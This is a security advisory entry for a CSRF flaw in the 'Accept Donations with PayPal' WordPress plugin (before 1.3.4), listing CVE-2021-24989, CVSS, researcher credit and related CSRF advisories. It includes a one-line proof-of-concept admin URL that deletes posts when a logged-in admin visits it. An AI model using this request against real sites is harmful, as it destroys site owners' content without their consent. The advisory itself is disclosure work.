WordPress Plugin Vulnerabilities

Accept Donations with PayPal < 1.3.4 - Arbitrary Post Deletion via CSRF

Description

The plugin does not have CSRF check in place and does not ensure that the post to be deleted belongs to the plugin, allowing attackers to make a logged in admin delete arbitrary posts from the blog

Proof of Concept

https://examle.com/wp-admin/admin.php?page=wpedon_menu&action=delete&action2=delete&order[]=1

Affects Plugins

Plugin icon
easy-paypal-donation
Fixed in 1.3.4

References

CVE
CVE-2021-24989

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
7.1 (high)

Miscellaneous

Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
https://kazet.cc/
Verified
Yes
WPVDB ID
82c2ead1-1d3c-442a-ae68-359a4748447f

Timeline

Publicly Published
2021-12-09 (about 2 years ago)
Added
2021-12-25 (about 2 years ago)
Last Updated
2022-04-10 (about 2 years ago)

Other

Published
Title
Published
2021-11-22
Title
Kudos Donations < 3.1.2 - Arbitrary Items Deletion via CSRF
Published
2022-09-26
Title
WP Page Widget < 4.0 - Settings Update via CSRF
Published
2020-02-18
Title
Easy Property Listings < 3.4 - Cross-Site Request Forgery (CSRF)
Published
2023-11-07
Title
Profile Builder < 3.10.4 - Plugins Activation/Deactivation CSRF
Published
2023-03-22
Title
Product Feed PRO for WooCommerce < 12.4.5 - Multiple CSRF